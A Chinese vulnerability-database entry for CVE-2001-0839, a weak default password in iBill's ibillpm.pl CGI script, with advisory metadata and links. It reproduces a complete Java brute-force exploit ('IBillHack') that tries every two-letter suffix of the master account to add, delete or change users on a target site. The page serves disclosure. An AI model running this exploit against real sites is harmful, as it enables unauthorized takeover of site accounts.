CVE-2001-0839
CVSS7.5
发布时间 :2001-12-06 00:00:00
修订时间 :2016-10-17 22:12:16
NMCOES    

[原文]ibillpm.pl in iBill password management system generates weak passwords based on a client's MASTER_ACCOUNT, which allows remote attackers to modify account information in the .htpasswd file via brute force password guessing.


[CNNVD]iBill管理脚本弱硬编码密码漏洞(CNNVD-200112-080)

        iBill密码管理系统的ibillpm.pl会生成基于client's MASTER_ACCOUNT的弱密码,远程攻击者可以通过蛮力攻击进行密码猜测,从而修改.htpasswd文件的账户信息。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0839
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0839
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-080
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=100404371423927&w=2
(UNKNOWN)  BUGTRAQ  20011025 Weak authentication in iBill's Password Management CGI
http://www.securityfocus.com/bid/3476
(UNKNOWN)  BID  3476
http://xforce.iss.net/static/7352.php
(UNKNOWN)  XF  ibillpm-cgi-insecure-password(7352)

- 漏洞信息

iBill管理脚本弱硬编码密码漏洞
高危 设计错误
2001-12-06 00:00:00 2005-10-20 00:00:00
远程  
        iBill密码管理系统的ibillpm.pl会生成基于client's MASTER_ACCOUNT的弱密码,远程攻击者可以通过蛮力攻击进行密码猜测,从而修改.htpasswd文件的账户信息。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (21129)

iBill Management Script Weak Hard-Coded Password Vulnerability (EDBID:21129)
cgi remote
2001-10-25 Verified
0 MK Ultra
N/A [点击下载]
source: http://www.securityfocus.com/bid/3476/info

iBill is an Internet billing company that provides secure payment processing for e-commerce.

A vulnerability exists in iBill's CGI password management script called ibillpm.pl. The default password is the client's MASTER_ACCOUNT name plus two lower case letters. The MASTER_ACCOUNT name can be determined by viewing the HTML source of the site's sign-up pages. 

// 10/25/2001

import java.net.*;
import java.io.*;

/**
* IBillHack class for informational purposes only.
* This program brute-forces POST requests to the iBill Password Management CGI
* and allows us to add/delete usernames and change passwords on websites 
* that used iBill Password Management using default installation.
* By default iBill sets up the $authpwd as MASTER_ACCOUNTxx, where "xx" 
* is a pair of letters [a-z]. It is suggested that all clients of iBill 
* that use Password Management aquire a new $authpwd for their ibillpm.pl 
* script.
* MASTER_ACCOUNT can be found as part of the <FORM> tag on the signup pages:
* <input type="hidden" name="account" value="123456-500">
* OR
* <input type="hidden" name="account" value="123456500">
* The last 3 digits is the sub-account, and somtimes there is a dash, 
* sometimes not. In this case MASTER_ACCOUNT=123456.
*
* /cgi-bin/ibillpm.pl is the default path to the CGI. Sometimes the webmaster 
* is smart enough not to use the default and request that $authpwd be changed
* to something more secure. In addition to these measures, a webmaster can 
* also modify their httpd.conf to only allow iBill IP addresses to request 
* the Password Management CGI script.
* 
* The correct $authpwd is not saved here. That is an optional exercise for 
* the reader. 
*
* Here are the return codes from the ibillpm.pl script (not HTTP status codes) 
* and their meaning:
* 
* 501 - authentication failed
* 502 - invalid request type (command must be add, delete, or chgpwd)
* 503 - failed to locate the password file
* 504 - failed to open the password file
* 505 - specified user already exists
* 506 - specified user doesn't exist
* 507 - invalid username
* 508 - invalid password
*
* 201 - add user success
* 202 - delete user success
* 203 - change password success
*
*/

public class IBillHack {

    public static void main(String args[]) {
        if (args.length != 6) {
            System.err.println("Usage: java IBillHack <target_hostname> </path/to/cgi-bin/ibillpm.pl> " + 
                        "<add|delete|chgpwd> <username> <password> <master_account>");
            System.err.println("Example: java IBillHack www.somesite.com /cgi-bin/ibillpm.pl add bob 1pass 123456");
            System.exit(1);
        } 

        char letters[] = {
            'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 
            'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'
        };

        for (int i = 0; i < letters.length; i++) {
            for (int j = 0; j < letters.length; j++) {
                try {
                    Socket s = new Socket(InetAddress.getByName(args[0]), 80);
                    StringBuffer headers = new StringBuffer();

                    headers.append("POST " + args[1] + " HTTP/1.1\n");
                    headers.append("Referer: http://" + args[0] + args[1] 
                                   + "\n");
                    headers.append("Content-Type: application/x-www-form-urlencoded\n");
                    headers.append("User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)\n");
                    headers.append("Host: " + args[0] + "\n");

                    StringBuffer query = new StringBuffer();

                    query.append("\nauthpwd=" + args[5] + letters[i] 
                                 + letters[j] + "&reqtype=" + args[2] 
                                 + "&username=" + args[3] + "&password=" 
                                 + args[4] + "&submit=Submit\n");

                    String q = query.toString();

                    headers.append("Content-Length: " + q.length() + "\n");

                    OutputStream os = 
                        new BufferedOutputStream(s.getOutputStream());

                    os.write(headers.toString().getBytes());
                    os.write(q.getBytes());
                    os.flush();

                    System.err.println("Sending...");
                    System.out.print(headers.toString());
                    System.out.println(q);

                    s.close();

                    Thread.sleep(500);
                } catch (Exception e) {
                    e.printStackTrace();
                } 
            } 
        } 

		System.err.println("--------------------------------------------------------------------");
		System.err.println("Finished trying all aa-zz combinations for MASTER_ACCOUNT " + args[5]);
		System.err.println("Try logging into the members section of " + args[0] + " with username/password " + args[3] + "/" + args[4]);
		System.err.println("--------------------------------------------------------------------");
    } 

}
		

- 漏洞信息

13978
iBill ibillpm.pl Default Password Generation Weakness
Local / Remote Cryptographic
Loss of Integrity Solution Unknown
Exploit Public

- 漏洞描述

- 时间线

2001-10-25 Unknow
2001-10-25 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

iBill Management Script Weak Hard-Coded Password Vulnerability
Design Error 3476
Yes No
2001-10-25 12:00:00 2009-07-11 09:06:00
This vulnerability was discovered and posted to BugTraq by MK Ultra <mkultra@dqc.org>.

- 受影响的程序版本

iBill Internet Billing Company Processing Plus 0

- 漏洞讨论

iBill is an Internet billing company that provides secure payment processing for e-commerce.

A vulnerability exists in iBill's CGI password management script called ibillpm.pl. The default password is the client's MASTER_ACCOUNT name plus two lower case letters. The MASTER_ACCOUNT name can be determined by viewing the HTML source of the site's sign-up pages.

- 漏洞利用

The following exploit was provided by MK Ultra &lt;mkultra@dqc.org&gt;

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站